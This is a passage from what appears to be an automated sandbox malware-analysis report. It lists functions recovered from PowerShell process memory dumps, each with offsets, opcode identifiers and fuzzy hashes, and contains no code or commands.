                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: _
                                                                        • API String ID: 0-701932520
                                                                        • Opcode ID: fb23dc4d641eb042e8e1baea45c3ceae9e3efa41ab922ca2abb727d13f5dd9c1
                                                                        • Instruction ID: 25831cfd38028ad6ebeb08479df021c4faa14c681a925719e0484c0a5d649c32
                                                                        • Opcode Fuzzy Hash: fb23dc4d641eb042e8e1baea45c3ceae9e3efa41ab922ca2abb727d13f5dd9c1
                                                                        • Instruction Fuzzy Hash: B782A2B4B01205DFEB14CBA8C459B6EBBB2AF85708F24C569E9059F351CB72DC42CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0796CFB8 Relevance: 2.1, Strings: 1, Instructions: 822COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: DUk
                                                                        • API String ID: 0-518859012
                                                                        • Opcode ID: 351140d9151b960992a412146a6caf8883045b3d91521c527595db0808758460
                                                                        • Instruction ID: 7c545836ea6ecfffe61cbebba7a59867c323286c3228a7f9d9ba2dfd5fc1009e
                                                                        • Opcode Fuzzy Hash: 351140d9151b960992a412146a6caf8883045b3d91521c527595db0808758460
                                                                        • Instruction Fuzzy Hash: 935227B1B00205CFDF24DB68C448BAABBF6AF85618F14856AD426DF351DB72DC41CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07961BE6 Relevance: 1.7, Strings: 1, Instructions: 422COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: h2k
                                                                        • API String ID: 0-1167148820
                                                                        • Opcode ID: 17d8a9898c6e093aa48d9b63ad2c4e433da84bcb9e4067c702ef483ef20a74f2
                                                                        • Instruction ID: cc0b8f760c4d8da5f1862d20a2594776a8de89cb3f95e9c237751a32fd9c62b0
                                                                        • Opcode Fuzzy Hash: 17d8a9898c6e093aa48d9b63ad2c4e433da84bcb9e4067c702ef483ef20a74f2
                                                                        • Instruction Fuzzy Hash: D0026AB4B412099FEB14CB98C554FADBBB2FB85309F14C169E805AB351C772EC42CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07965890 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: x.k
                                                                        • API String ID: 0-3814145804
                                                                        • Opcode ID: 5b489d84058e19e45d51cdda904dca8587b2953d49178b79a5e79a95fd91afed
                                                                        • Instruction ID: 46a14a293a4843fbe1609f8697f645e4d85f36faedfd0ed6142fb6d9df189fb4
                                                                        • Opcode Fuzzy Hash: 5b489d84058e19e45d51cdda904dca8587b2953d49178b79a5e79a95fd91afed
                                                                        • Instruction Fuzzy Hash: A0319574B403049FF71897A4C855BAE7AA3AB85724F208839E9017F791CF769C42CBE5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0796F600 Relevance: .7, Instructions: 659COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b5913c1c8b3c47772f4c15019ec954bac8e5aebda98d4f89b37bad47963329a3
                                                                        • Instruction ID: 25f2d060f0d77760f1034bb4565a37c1dcdb18b7c400e92435ead7c7d60c7fcc
                                                                        • Opcode Fuzzy Hash: b5913c1c8b3c47772f4c15019ec954bac8e5aebda98d4f89b37bad47963329a3
                                                                        • Instruction Fuzzy Hash: C92239B17043068FD7258B78A81876A7BA7AFC1718F1485BBD506DB391EB71CC42CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07960850 Relevance: .6, Instructions: 598COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e724c1ce66de727272d1aafeef2f30a1b750d11fc8b170274d8b8879fbbb97e5
                                                                        • Instruction ID: 49858c1cf7e10961a986a4237a470e54427619234adbd11cfa28711664f44fbd
                                                                        • Opcode Fuzzy Hash: e724c1ce66de727272d1aafeef2f30a1b750d11fc8b170274d8b8879fbbb97e5
                                                                        • Instruction Fuzzy Hash: 08127BB17043069FDB258B6CC498B6ABBA6AFC1218F14C6BBD406DB352DB35CC41C7A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07961718 Relevance: .5, Instructions: 483COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9d601f688ce694087a88ef32b6653878851d3f6be7ff050bc501fe2f3873b52b
                                                                        • Instruction ID: e10d6a0b770f6508f0a4d18415c9af8f1f8f99db0ebf885a03641401439c9c0b
                                                                        • Opcode Fuzzy Hash: 9d601f688ce694087a88ef32b6653878851d3f6be7ff050bc501fe2f3873b52b
                                                                        • Instruction Fuzzy Hash: EF129FB4B402099FD714CB98C454AADBBF2BF89709F14C16AD805AF755CB72EC42CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07963BEC Relevance: .5, Instructions: 465COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d24748392db605e8a9d1bf1f7a792ac208e8fe3f5fc04bd4bd5bb8a98a719f6a
                                                                        • Instruction ID: ce5aa73cda227e8cd30e07ddcef9a9effa5d21865adeef1b00fb6f9eb5005ee7
                                                                        • Opcode Fuzzy Hash: d24748392db605e8a9d1bf1f7a792ac208e8fe3f5fc04bd4bd5bb8a98a719f6a
                                                                        • Instruction Fuzzy Hash: CF127BB4A01205EFDB14CB98C559F69BBB2BF85308F24C6A9E9055F361CB72EC42CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 079616FC Relevance: .4, Instructions: 399COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1c73f7fd782a624b8766759e218d8709941b75b7630e22a4f72bdaca3c00269d
                                                                        • Instruction ID: 8e7f40997e166a7a27b8ea47179d43cde09ed12dc7e708ccc611fe792dba0473
                                                                        • Opcode Fuzzy Hash: 1c73f7fd782a624b8766759e218d8709941b75b7630e22a4f72bdaca3c00269d
                                                                        • Instruction Fuzzy Hash: 1BF139B4A41209DFDB14CB98C544EADBBF2FB89319F14C16AE805AB355C772EC42CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033DAEF0 Relevance: .4, Instructions: 353COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064493981.00000000033D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e63fe0015703338b69cf4a76702c1cc296ba9869fdca467617ff9038997ab8eb
                                                                        • Instruction ID: f1b0ec228f9548c4d4eaca63fb8f2a20ca3f31a069bf9aa097811d6552836a01
                                                                        • Opcode Fuzzy Hash: e63fe0015703338b69cf4a76702c1cc296ba9869fdca467617ff9038997ab8eb
                                                                        • Instruction Fuzzy Hash: DEE13975A002099FDB15CF98E8C4A9DFBB2FF48310F298199E815AB365C775ED81CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033D73A8 Relevance: .3, Instructions: 313COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064493981.00000000033D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a8239448f2071c61d1944edb354337f92b5b4fe6f7d0bfe5c62eab8fafd08c03
                                                                        • Instruction ID: e78a77fe70a1075aa91ddacf91f84a5d24a2d8b3c58ef963a67c380bed0268c3
                                                                        • Opcode Fuzzy Hash: a8239448f2071c61d1944edb354337f92b5b4fe6f7d0bfe5c62eab8fafd08c03
                                                                        • Instruction Fuzzy Hash: 6FC1B236A00208DFCB14DFA4E984AADBBB6FF85311F158559E406AF365DB34ED49CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033DF0FC Relevance: .3, Instructions: 281COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064493981.00000000033D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d11dd8be792b2277cff00b60912cce80b502a0cde724242f86a2278ab1137ca8
                                                                        • Instruction ID: 640fca26b365794270a2b0adee173d56af3a592a56f32508b8a1e7ab55ef7b70
                                                                        • Opcode Fuzzy Hash: d11dd8be792b2277cff00b60912cce80b502a0cde724242f86a2278ab1137ca8
                                                                        • Instruction Fuzzy Hash: 03B17F76E00219DFDB10CFA9E8C57DDBBF2BF48314F188129D816AB254EB749885CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033DF9CC Relevance: .3, Instructions: 260COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064493981.00000000033D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2920cd31ba9a9872ac817acfb940900ee57da9813e1f97e24a889f545c6c9754
                                                                        • Instruction ID: 1de65133a33234d3dd66277a7bd1652c61d0000c31423b9a4071a9f81c47ec3a
                                                                        • Opcode Fuzzy Hash: 2920cd31ba9a9872ac817acfb940900ee57da9813e1f97e24a889f545c6c9754
                                                                        • Instruction Fuzzy Hash: 96A13D72E002199FDB10CFA9E8C579DBBF1BF48714F288129D816AB354EB749885CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07965A48 Relevance: .2, Instructions: 238COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 770a4bf05a8b08b5d05c9feff9edee53d2e85de104b817f99e7a0a367ad120d3
                                                                        • Instruction ID: 4c8854fbd4713cceb2861fa398dd54db085043a2b5b23f31872db56dcaf325e8
                                                                        • Opcode Fuzzy Hash: 770a4bf05a8b08b5d05c9feff9edee53d2e85de104b817f99e7a0a367ad120d3
                                                                        • Instruction Fuzzy Hash: 18717AB1B003069FCB249B78984876ABBE5EFC5218F15867BC446DB341EB36C951CBB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033D2AA0 Relevance: .2, Instructions: 225COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064493981.00000000033D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8f8580cc90ada0e0a584d8d4b5c8f0c92d68c654d2ca6eb072452ba083fb1c96
                                                                        • Instruction ID: b252b68e93cbc4421f72a3811e6d59d3463960b3b2f260c4a197f0bab50f9973
                                                                        • Opcode Fuzzy Hash: 8f8580cc90ada0e0a584d8d4b5c8f0c92d68c654d2ca6eb072452ba083fb1c96
                                                                        • Instruction Fuzzy Hash: 07919E75A006058FCB15CF58C4D4AAEFBB1FF88314B248699D915EB3A5C736EC51CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0796D6C4 Relevance: .2, Instructions: 205COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f572880dd51a8397b694ea5b166b85b0ed5c9de28117a68e1e1affb17b392390
                                                                        • Instruction ID: 6a5e720a3af011a87951670151a2dcb3a619306409c1877a184c3dd85d8bd917
                                                                        • Opcode Fuzzy Hash: f572880dd51a8397b694ea5b166b85b0ed5c9de28117a68e1e1affb17b392390
                                                                        • Instruction Fuzzy Hash: 45814BB4B01205DFDB14CF98C458AA9BBF2EF89318F14C669D825AB355C732EC42CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0796D6D8 Relevance: .2, Instructions: 201COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 57123bb715b9b879aca651962c80f2496e1f862eb36c365507f4dde6f6c0b083
                                                                        • Instruction ID: d8138f916f22fbb24491c2ede3f1023fd2ba6342babf27a10f2fa0091852d78a
                                                                        • Opcode Fuzzy Hash: 57123bb715b9b879aca651962c80f2496e1f862eb36c365507f4dde6f6c0b083
                                                                        • Instruction Fuzzy Hash: A4815AB4B01205DFDB14CF58C498AA9BBF6AF89318F14C669D825AB315C732EC42CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033D7B70 Relevance: .2, Instructions: 193COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064493981.00000000033D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d586581e310ba5ea1c751bd75b46608270dde25274d40a524030bd086cf83df8
                                                                        • Instruction ID: 9e76e5bb8e3f2c3a1147f8a44303b77d007a245f4a5d337439e6f0d6f7f878c8
                                                                        • Opcode Fuzzy Hash: d586581e310ba5ea1c751bd75b46608270dde25274d40a524030bd086cf83df8
                                                                        • Instruction Fuzzy Hash: 2B718E31A002098FDB24DF68D884A9DBBFAEF85314F14CA6AD4569B751DB71AC46CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033D7CDE Relevance: .2, Instructions: 188COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064493981.00000000033D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 67f8442a2ef3d5acacf1663be758c65a03ac9c3cbf31acb78a4f6387fb5dc537
                                                                        • Instruction ID: 550d781467c896cd7a206fe600127eea6e9bd61c0f7d3f3f728ba7130415f859
                                                                        • Opcode Fuzzy Hash: 67f8442a2ef3d5acacf1663be758c65a03ac9c3cbf31acb78a4f6387fb5dc537
                                                                        • Instruction Fuzzy Hash: E8715371E00208DFDB24DFA4E894BADBBF6BF88314F148469D412AB760DB75AD45CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0796F5E4 Relevance: .1, Instructions: 141COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 631a13a5cbccca3799484995b77bd530dfe81e1b56c696679adc2fc480372d18
                                                                        • Instruction ID: 6fa8d24487f8b57d0b01ac04c69b8aa779ad7e88e1048f9ce44c052fdcd03985
                                                                        • Opcode Fuzzy Hash: 631a13a5cbccca3799484995b77bd530dfe81e1b56c696679adc2fc480372d18
                                                                        • Instruction Fuzzy Hash: D64138F1B043068FDB259B68B509A697BA7AF81318F1486BBD5049F362D732CC41CBB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033D7B5B Relevance: .1, Instructions: 120COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064493981.00000000033D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 27f3b600e5de99a7cf41cda9bb91bfe51aa155b294a45b273c4b7b4cffc5c119
                                                                        • Instruction ID: 3b8ceac5c32cc84d081828401b4742b2a921bd53d67fd657c32f6b705d06f9a5
                                                                        • Opcode Fuzzy Hash: 27f3b600e5de99a7cf41cda9bb91bfe51aa155b294a45b273c4b7b4cffc5c119
                                                                        • Instruction Fuzzy Hash: 04416E71A00208CFDB28DFA9D8856DDBBF6BF88314F14C56AD016AB764DB75AC45CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033D7901 Relevance: .1, Instructions: 120COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064493981.00000000033D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e4e67cdaff50905db56b54310c7a186cde78e85fdf33e0acd2809b2a0b1f86cc
                                                                        • Instruction ID: 7919fd16e1b733ac3af63403dee45e16ce1f8f944f02a8de8e97e2abe228c9e1
                                                                        • Opcode Fuzzy Hash: e4e67cdaff50905db56b54310c7a186cde78e85fdf33e0acd2809b2a0b1f86cc
                                                                        • Instruction Fuzzy Hash: C64171367042148FDB19EF34D995AA9BBF7EF89350F088469E446EB3A0CB349C41CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033DB1F7 Relevance: .1, Instructions: 117COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064493981.00000000033D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5cec7cd57c7792245af230dfb83806d02e96d9a1051282bf127151f4bbda82d2
                                                                        • Instruction ID: 1d0e23254efd18332a6626972a13cd2d605994e664bfcf4672cef42f6f93cb38
                                                                        • Opcode Fuzzy Hash: 5cec7cd57c7792245af230dfb83806d02e96d9a1051282bf127151f4bbda82d2
                                                                        • Instruction Fuzzy Hash: F051BA35A00209EFDB05CF98D884A9DFBB2FF48314F298559E405AB765C775ED82CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033DAE91 Relevance: .1, Instructions: 110COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064493981.00000000033D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 62c1c5f7f32616e52201afba4980ce4b3e504129bdb9372021ddd80a8587d83f
                                                                        • Instruction ID: 9eda5ad1914183b932d2b2ee128267aebe74c8362f4b6a6a6cc8bd0727077e5c
                                                                        • Opcode Fuzzy Hash: 62c1c5f7f32616e52201afba4980ce4b3e504129bdb9372021ddd80a8587d83f
                                                                        • Instruction Fuzzy Hash: C241C271A092459FCB02CF68C9D4A99FBB1FF49310B1982DAD445EB3A2C731EC41CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033DC54B Relevance: .1, Instructions: 108COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064493981.00000000033D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9fced0e76bb7b34f6de16d3e846aa7a9bcd1e0d3dde5e50009e2b52d755bb9d5
                                                                        • Instruction ID: 4a2a287e1a11aacb7513d94ce2edca02e241cf4c28699bada9f1f77f9bdd420b
                                                                        • Opcode Fuzzy Hash: 9fced0e76bb7b34f6de16d3e846aa7a9bcd1e0d3dde5e50009e2b52d755bb9d5
                                                                        • Instruction Fuzzy Hash: F4413E35A012288FCF25DB34D8946EEB7B2AF89305F1485E9D409AB352CB35DE85CF81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07965A26 Relevance: .1, Instructions: 106COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8f2a3b5f9d0a96c1df079aef16508eb509bd4406970e5b4f38b154971128fc64
                                                                        • Instruction ID: 508d961e93ef3f6db880535bbb0cf16c344e63a21035f19e48e672a66b38b4ce
                                                                        • Opcode Fuzzy Hash: 8f2a3b5f9d0a96c1df079aef16508eb509bd4406970e5b4f38b154971128fc64
                                                                        • Instruction Fuzzy Hash: 993196B0B00342DFD7208BB08849B697FA29F82258F5645BBD801DB292EA36C951C7A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033D2BB0 Relevance: .1, Instructions: 106COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064493981.00000000033D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e37eb4df85c9c6f077b0021fd494a2a66d088eed1a6c79e761ce4bb8c0435458
                                                                        • Instruction ID: 11a77f7088eaab9a577aa958bb0a72bb074f59b267a60978fb41dd46afe323b6
                                                                        • Opcode Fuzzy Hash: e37eb4df85c9c6f077b0021fd494a2a66d088eed1a6c79e761ce4bb8c0435458
                                                                        • Instruction Fuzzy Hash: 12414675A002098FCB15CF58D5D4AAAFBB1FF48314B158699C916AB369C732FC91CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 079614C0 Relevance: .1, Instructions: 94COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 347db4b06209d60dd0d79005c86a406a52c982b0be9d304963ae7768f3f4391b
                                                                        • Instruction ID: 5b6b9ff2d0cecdb411db053e31c521caaf64ea34bb53f49aef10bdaf0cc15786
                                                                        • Opcode Fuzzy Hash: 347db4b06209d60dd0d79005c86a406a52c982b0be9d304963ae7768f3f4391b
                                                                        • Instruction Fuzzy Hash: B621C0B238031A6BD73456BD8815B37F7CAABC471DF20893AA407DB389ED76D8418361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033DC6D0 Relevance: .1, Instructions: 92COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064493981.00000000033D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2a62c8c26431f5c8e4b48a267500226ffb0665a4cc53c28fb1b562c460006e7b
                                                                        • Instruction ID: b96912b15edfb879f9474522024c52e516c5ed1a9797972130525c6de303c261
                                                                        • Opcode Fuzzy Hash: 2a62c8c26431f5c8e4b48a267500226ffb0665a4cc53c28fb1b562c460006e7b
                                                                        • Instruction Fuzzy Hash: 19313B35B012288FCB25DB74D8956EEB7B2AF89304F1484E9D40AAB351CB35DE85CF81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033DAE62 Relevance: .1, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064493981.00000000033D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
